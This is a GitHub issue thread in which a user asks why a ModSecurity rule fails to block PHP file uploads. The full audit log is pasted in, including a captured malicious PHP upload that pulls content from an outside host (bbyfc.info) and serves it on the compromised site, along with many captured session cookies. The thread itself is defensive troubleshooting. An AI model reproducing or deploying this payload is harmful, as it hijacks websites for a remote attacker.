### ISSUE TITLE
I wrote a rule to stop hackers upload the php files,but it doesn't work?

### ISSUE THREAD

**Issue by prince-java** [SpiderLabs/owasp-modsecurity-crs#831]
I wrote a rule to stop hackers upload the php files,but it doesn't work.
This is my rule:
`SecRule REQUEST_BODY "@contains .php" "phase:2,deny,log,id:55"`

This is the auditlog:

**
--a359da41-A--
[05/Jul/2017:16:18:07 +0800] WVygv38AAAEAAEk-Nk0AAAAB 122.114.220.36 43546 116.255.151.61 80
--a359da41-B--
POST /testupload/upload_file.php HTTP/1.1
Host: 103059.testyuming.top
X-Real-IP: 116.255.132.12
X-Forwarded-For: 116.255.132.12
Connection: close
Content-Length: 1144
Pragma: no-cache
Cache-Control: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://103059.testyuming.top
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMAeF1BzetQ6fICt6
Referer: http://103059.testyuming.top/testupload/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=4916b48767c1663142e0417c6bcbdea8; qNQaq_admin_username=12feW_ek9vEEfZD55BEsOlqNBjEqh43DeQZOYrpXZEPA3Q; qNQaq_siteid=edc76q_W1x-9aP2i_IQG6UlPAfv4KZva1ma2jz5P; qNQaq_userid=6582kbe_vU_ZL517RdkByM4zZ81vjfD4AtRmCN8b; qNQaq_admin_email=2856ZScqeWxLpPk0IVGOVXYAoq6u85EluW7Y005AavGW99I_RwR7acVv; qNQaq_sys_lang=d1d3IgIHweM_icq0phG3sr-usq4yJWql6Hd2H-mCjRuGhw; treeview-black=1; qNQaq_module=2abbO6LsOsuflaEg7EsasOllZFXZcwL_NW2PJE7VWOgmIWoz; qNQaq_catid=379eJqxjp3f_4JXT5k6ieq2yFQdoCBG4UX_XgoNE; qNQaq_att_json=09488GEQq3S9vzVjFGfiHk0sFVFifN7pt1JFPUcdx9XJf6_Nbi11b3WqTg4faXltL2DR-4qi_66WbblKZar-fUjMfuzS2Z5p3Qd1cHVVuz4rubF50NwIq54KrUOdnWw9buSNZg_Ojl8UlOP1wdsxeshdTYyxdTWisP4JGAvUi7csRoC6GFMpkeW7IxAbgCnC2pBTYrqsei7HxOWrvnzJg4dmQm8C-LEYgsfcrimumGIF_iNjNRQmmGeiYekrYOso5MV4WXNI8b2w3IsoRBOwl54LV3rYa4X6rAKForluYTxZ1H6WzUv5p50t13qzAnvZNcWd8MpBA3xxs_cH7J189XofNRRdIN5LvIASPyPk7r9NKKQZmkT8kgY3Jv7cToUqnrhhr4YVeOmxjQlfx1QZwW1QX293klAkmGGCd4TTlHbAtetzQ4pniYj9B8a_Smt3wgSEJ80CgO29zc0P82X8RcXOB4nYOy6WwyWjCGURQxhf19bG2lA7gLqRUnXD2vmPr_zt2lxxmuWtd-lgy60-CRgoX6vqys3W9e2BZ26LUgeA; Ccnb_2132_saltkey=W40ugv0G; Ccnb_2132_lastvisit=1499221250; Ccnb_2132_ulastactivity=313aDfXfUk3V3NXO%2Fc93eoSHQG4gQooX27Mzo%2BUHIiSx%2BEtocIdA; Ccnb_2132_auth=3e37LUhqdWrqDiNOpK7%2Be%2FgRmuiu%2BVXPHx1%2B%2Bq2UcjOG%2FauU8%2FK8JE0OgVJ8M3juDgqXMQHRjoxANVEGtHMU; Ccnb_2132_nofavfid=1; Ccnb_2132_sid=p6v1bb; Ccnb_2132_lastact=1499233862%09misc.php%09patch; WUFoy_admin_username=b15cI17DCoTGGfByvyHdZuOi29_jxz0GWyil3GyENb879A; WUFoy_siteid=2db6xaCxb_X_ldWPa8sVFsyyjbTEQj6QrCRZiXfI; WUFoy_userid=e8aaqmBWyykEhqAiI94JMhUNq-RbYaNQvs3GUK4U; WUFoy_admin_email=e25eLRrL8QKZQ61xtKSpd06LQOrfEprhd1V8tatj8Hm5YOdYAIYrsU1E; WUFoy_sys_lang=cd73Uf2-HaQj7Ww66wWMG_V95LZpbUmE3xbi6lw1ZkPd3w; WUFoy_module=ee76hSwLvFOYipqspDacpFOcIfuHYS8FiLFE39lJDOVfzTY8; WUFoy_catid=d23dTbv37-wuHflDohKCnDKkQHncuXft4qPwHGJD; sYQDUGqqzHrefersh_time=0; DedeUserID=1; DedeUserID__ckMd5=b7c0eaec57dfb639; DedeLoginTime=1499234665; DedeLoginTime__ckMd5=2088558e5717cd24

--a359da41-C--
------WebKitFormBoundaryMAeF1BzetQ6fICt6
Content-Disposition: form-data; name="file"; filename="bdgfgef.php"
Content-Type: application/octet-stream

<?php
set_time_limit(0);

header("Content-Type: text/html;charset=gb2312");
date_default_timezone_set('PRC');
$Percent = rand(0,100);
if($Percent<30)
$asddsp4 = "http://bbyfc.info/158/";
else
$asddsp4 = "http://bbyfc.info/"; 

$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($asddsp4."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

echo $Content_mb;
die();
?><?php
set_time_limit(0);

header("Content-Type: text/html;charset=gb2312");
date_default_timezone_set('PRC');
$Remote_servee = "http://bbyfc.info/"; 
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($Remote_servee."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

echo $Content_mb;

?>
------WebKitFormBoundaryMAeF1BzetQ6fICt6
Content-Disposition: form-data; name="submit"

Submit
------WebKitFormBoundaryMAeF1BzetQ6fICt6--

--a359da41-I--
submit=Submit
--a359da41-F--
HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 121
Connection: close
Content-Type: text/html

--a359da41-E--
Upload: bdgfgef.php<br />Type: application/octet-stream<br />Size: 0.826171875 Kb<br />Stored in: /tmp/phpLiSeY0
--a359da41-H--
Message: Audit log: Failed to lock global mutex: Permission denied
Stopwatch: 1499242687082389 14549 (- - -)
Stopwatch2: 1499242687082389 14549; combined=7329, p1=581, p2=6619, p3=4, p4=113, p5=11, sr=110, sw=1, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); ZZIDC/2.2.8.
Server: Apache
Engine-Mode: "ENABLED"

--a359da41-J--
1,846,"bdgfgef.php","<Unknown ContentType>"
Total,846

--a359da41-Z--
**

**Comment by dune73** [comment]
Sorry, but this is a ModSecurity and not a Core Rule Set question. So I am closing this.

Advice: Make sure you have Access Body enabled. You may want to enable the Debug Log to the highest level and examine your rule in said log. It usually becomes clear very fast.
